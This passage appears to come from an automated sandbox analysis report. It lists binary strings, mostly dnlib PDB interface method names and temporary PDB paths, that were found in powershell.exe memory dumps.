                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.pdbhP source: powershell.exe, 00000014.00000002.494874589.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.pdb source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: .pdbW source: powershell.exe, 00000007.00000002.458812046.000000001C370000.00000004.00000020.00020000.00000000.sdmp
